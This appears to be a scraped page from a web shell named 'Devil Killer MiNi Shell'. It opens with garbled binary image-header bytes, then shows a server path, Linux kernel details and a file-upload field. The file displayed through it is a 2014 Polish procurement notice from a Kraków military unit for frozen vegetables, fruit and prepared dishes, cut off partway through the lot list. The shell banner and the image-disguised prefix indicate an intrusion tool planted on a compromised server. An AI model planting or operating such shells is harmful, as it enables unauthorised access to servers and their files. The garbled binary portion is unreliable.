JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140908/190989-N-2014.html

<p class="kh_header"><b>Kraków: Dostawa produktów głęboko mrożonych, warzyw i owoców mrożonych.</b><br>
<b>Numer ogłoszenia: 190989 - 2014; data zamieszczenia: 08.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostaka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów głęboko mrożonych, warzyw i owoców mrożonych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów mrożonych, warzyw i owoców mrożonych w zakresie 12 zadań: truskawka zamrożona, czarna porzeczka zamrożona, śliwka mrożona, kapusta brukselska zamrożona, fasolka szparagowa zamrożona, różyczki kalafiora zamrożone, mieszanka warzywna II składnikowa zamrożona, mieszanka warzywna III składnikowa zamrożona, szpinak zamrożony, flaki zamrożone, pierogi z mięsem zamrożone, pierogi z kapustą i grzybami zamrożone, pierogi z serem zamrożone, knedle owocowe zamrożone, uszka z kapustą i grzybami zamrożone, naleśniki z serem zamrożone, naleśniki z owocami zamrożone, krokiety z kapusta i grzybami zamrożone, krokiety z mięsem zamrożone, pyzy ziemniaczane z mięsem zamrożone, gołąbki zamrożone, paszteciki drożdżowe z mięsem zamrożone, paszteciki drożdżowe z kapusta i grzybami zamrożone, paszteciki drożdżowe z pieczarkami i serem zamrożone, pyzy ziemniaczane zamrożone, kluski śląskie zamrożone, kopytka zamrożone, frytki zamrożone, bigos zamrożony, kotlet mielony wieprzowo - wołowy zamrożony, sznycel wieprzowy zamrożony, sznycel drobiowy zamrożony, kotlet schabowy panierowany zamrożony, kotlet de vollaile zamrożony, kotlet z piersi kurczaka panierowany zamrożony, roladka z kurczaka parzona, udziec z kurczaka panierowany zamrożony, fasolka po bretońsku zamrożona, gulasz wieprzowy zamrożony, gulasz wołowy zamrożony..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.31.11.00-2, 15.33.11.70-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w postępowaniu wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca zobowiązany jest załączyć do oferty: 1)aktualną potwierdzoną w 2014r. Decyzję Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu, do wprowadzenia do obrotu produktów pochodzenia niezwierzęcego. Podstawa prawna: art. 61 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 z późn. zm.) lub zaświadczenie o wpisie do rejestru zakładów podlegających Urzędowi Kontroli organów Państwowej Inspekcji Sanitarnej.2)aktualny, potwierdzony w 2014 r., dokument potwierdzający stosowanie wdrożonego systemu HACCP, tj.: - Certyfikat HACCP, wystawiony przez niezależną, akredytowaną jednostkę certyfikującą; lub - zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub właściwego organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie art. 59 i art. 73 ust. 1 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia; lub - protokół z kontroli sanitarnej przeprowadzonej przez organ Państwowej Inspekcji Sanitarnej, jako organ urzędowej kontroli żywności, w skład której wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymywania systemu HACCP na podstawie art. 59 i art. 73 ust. 1 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia. 
W przypadku korzystania z usług podwykonawców każdy z nich powinien posiadać ww. dokumenty.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk OFERTA, 2. Wypełniony formularz cenowy w zakresie zadań, których realizację wykonawca oferuje, 3. Oryginał lub kopię pełnomocnictwa: a) dla osoby/osób podpisującej/cych ofertę - do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). b) dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie. 4. Wykonawca zobowiązany będzie posiadać przez cały okres trwania umowy ubezpieczenie odpowiedzialności cywilnej do wysokości nie niższej niż 10 000,00 zł w zakresie prowadzonej działalności obejmującym również odpowiedzialność ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez wyprodukowane, dostarczone lub sprzedane towary (środki spożywcze) oraz spowodowane przez niewykonanie lub nienależyte wykonanie zamówienia. Wykonawca najpóźniej w dniu podpisania umowy przedstawi zamawiającemu aktualną opłaconą polisę ubezpieczeniową OC, na kwotę nie mniejszą niż 10 000,00 zł.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na pisemny wniosek Zamawiającego Wykonawca będzie obowiązany do dokonania zmiany w ilościach poszczególnych towarów (środków spożywczych) określonych w ilościach zawartych w umowie przy zachowaniu następujących warunków: 1)zmiana wynikać będzie z potrzeb odbiorców, których nie można było przewidzieć w chwili zawarcia umowy; 2)zmiana nie będzie powodować przekroczenia maksymalnej wartości umowy brutto. 2.W przypadku zmiany wysokości stawki podatku od towarów i usług (VAT), bądź zmiany zakwalifikowania danego produktu w zakresie PKWIU, która wpływa na wartość należnego podatku VAT, na pisemny wniosek zainteresowanej strony, dopuszcza się zmianę wartości umowy brutto w stosunku do towarów, których zmiana dotyczy. 3.Dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS .Celem waloryzacji będzie tylko i wyłącznie urealnienie cen zakupu przedmiotu umowy. 4.Waloryzacja będzie dopuszczalna w razie łącznego spełnienia następujących warunków: 1)złożenia pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do dwukrotnej waloryzacji na swoją korzyść; 2)upływu pięciu miesięcy od rozpoczęcia realizacji umowy, 3)zmiany wskaźnika przekraczającej 6 punktów procentowych, 5.Waloryzację przeprowadzać się będzie w oparciu o otrzymane w formie pisemnej z GUS wskaźniki cen towarów i usług konsumpcyjnych - żywność i napoje bezalkoholowe, za miesiąc poprzedzający wpływ wniosku, o którym mowa powyżej, w odniesieniu do cen z grudnia 2014r., dla odpowiednich grup żywności. 6.Zmiana cen wskutek waloryzacji wymagać będzie formy pisemnej pod rygorem nieważności i wywoływać będzie skutek od dnia podpisania stosownego aneksu do umowy, który powinien zostać podpisany w terminie do 30 dni od daty otrzymania przez Zamawiającego stosownej informacji z GUS. W przypadku gdy Wykonawca wraz z wnioskiem do Zamawiającego przedłoży prawidłową informację z GUS, sporządzoną w formie pisemnej, dopuszcza się dokonanie waloryzacji na podstawie takiej informacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.3rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228 - sekcja zamówień publicznych, ul. Montelupich 3 , 30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2014 godzina 09:00, miejsce: Jednostka Wojskowa 4228 , ul. Montelupich 3 , 30-901 Kraków - kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1 - obszar I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka zamrożona kg 800, Czarna porzeczka zamrożone	kg 400, śliwka zamrożona	kg 400, Kapusta brukselska zamrożona kg	1 000, Fasolka szparagowa zamrożona	kg 1 000, Różyczki kalafiora zamrożone kg	1 800, Mieszanka warzywa II składnikowa zamrożona	kg 800,Mieszanka warzywna III składnikowa zamrożona	kg 800, Szpinak zamrożony kg 1 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.11.00-2, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - obszar II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta brukselska zamrożona kg 160,
Fasolka szparagowa zamrożona kg 160,
Różyczki kalafiora zamrożone	kg 440,
Mieszanka warzywa II składnikowa zamrożona kg 200,
Mieszanka warzywna III składnikowa zamrożona	kg 240,
Szpinak zamrożony kg 20,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - Obszar III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka zamrożona kg 80, Czarna porzeczka zamrożone kg 70, Sliwka zamrożona	kg 60, Kapusta brukselska zamrożona kg 410, Fasolka szparagowa zamrożona kg 390, Różyczki kalafiora zamrożone kg 390, Mieszanka warzywa II składnikowa zamrożona	kg 390, Mieszanka warzywna III składnikowa zamrożona kg 390, Szpinak zamrożony kg 190.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.11.00-2, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie 4 - obszar IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka zamrożona kg 500,
Czarna porzeczka zamrożone	kg 410,
Sliwka zamrożona	kg 250,
Kapusta brukselska zamrożona kg 700,
Fasolka szparagowa zamrożona kg 300,
Różyczki kalafiora zamrożone	kg 1 200,
Mieszanka warzywa II składnikowa zamrożona	kg 300,
Mieszanka warzywna III składnikowa zamrożona	kg 400,
Szpinak zamrożony kg 750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Obszar V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka zamrożona	kg 700, 
Czarna porzeczka zamrożone	kg 850,
Śliwka zamrożona	kg 850,
Kapusta brukselska zamrożona kg	1 000,
Fasolka szparagowa zamrożona kg	1 000,
Różyczki kalafiora zamrożone	kg	1 200,
Mieszanka warzywa II składnikowa zamrożona	kg	1 100,
Mieszanka warzywna III składnikowa zamrożona	kg	1 300,
Szpinak zamrożony kg	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.11.00-2, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie 6 - Obszar VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka zamrożona	kg 170,
Czarna porzeczka zamrożone	kg 100,
Sliwka zamrożona	kg 100,
Kapusta brukselska zamrożona kg	260,
Fasolka szparagowa zamrożona kg	480,
Różyczki kalafiora zamrożone	kg	590,
Mieszanka warzywa II składnikowa zamrożona	kg	520,
Mieszanka warzywna III składnikowa zamrożona	kg	320,
Szpinak zamrożony kg	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.11.00-2, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Obszar I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaki zamrożone	kg	3 000,
Pierogi z mięsem zamrożone	kg	1 000,
Pierogi z kapustą i grzybami zamrożone	kg 1 000,
Pierogi z serem zamrożone	kg	1 000
Knedle owocowe zamrożone	kg	1 000,
Uszka z kapustą i grzybami zamrożone	kg	300,
Naleśniki z serem zamrożone	kg	1 000,
Naleśniki z owocami zamrożone kg	2 500,
Krokiety z kapustą i grzybami zamrożone	kg	1 000,
Krokiety z mięsem zamrożone	kg	1 000,
Pyzy ziemniaczane z mięsem zamrożone kg	1 200,
Gołąbki zamrożone kg	1 500,
Paszteciki drożdżowe z mięsem zamrożone kg	400,
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	400,
Paszteciki drożdżowe z pieczarkami i serem zamrożone kg	400,
Pyzy ziemniaczane zamrożone	 kg	1 000,
Kluski śląskie zamrożone kg	1 000,
Kopytka zamrożone kg	1 000,
Frytki zamrożone	kg	1 600,
Bigos zamrożony	kg	400,
Kotlet mielony wieprzowo-wołowy zamrożony	kg	200,
Fasolka po bretońsku zamrożona kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zadanie 8 - Obszar II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaki zamrożone	kg	1 000,
Pierogi z mięsem zamrożone	kg	500,
Pierogi z kapustą i grzybami zamrożone	kg	100,
Pierogi z serem zamrożone	kg	400,
Uszka z kapustą i grzybami zamrożone	kg	16,
Naleśniki z serem zamrożone	kg	180,
Naleśniki z owocami zamrożone	kg	240,
Krokiety z kapustą i grzybami zamrożone	kg	120,
Krokiety z mięsem zamrożone	kg	100,
Pyzy ziemniaczane z mięsem zamrożone	kg	320,
Paszteciki drożdżowe z mięsem zamrożone	kg	80,
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	52,
Pyzy ziemniaczane zamrożone 	kg	200,
Kluski śląskie zamrożone	 kg	320,
Kopytka zamrożone	kg	400,
Frytki zamrożone	kg	52.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Obszar III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaki zamrożone	kg	380,
Pierogi z mięsem zamrożone	kg	380,
Pierogi z kapustą i grzybami zamrożone	kg	340,
Pierogi z serem zamrożone	kg	160,
Knedle owocowe zamrożone	kg	60,
Uszka z kapustą i grzybami zamrożone	kg	90,
Naleśniki z serem zamrożone	kg	220,
Naleśniki z owocami zamrożone	kg	120,
Krokiety z kapustą i grzybami zamrożone	kg	280,
Krokiety z mięsem zamrożone	kg	240,
Pyzy ziemniaczane z mięsem zamrożone	kg	320,
Gołąbki zamrożone	kg	100,
Paszteciki drożdżowe z mięsem zamrożone kg	50,
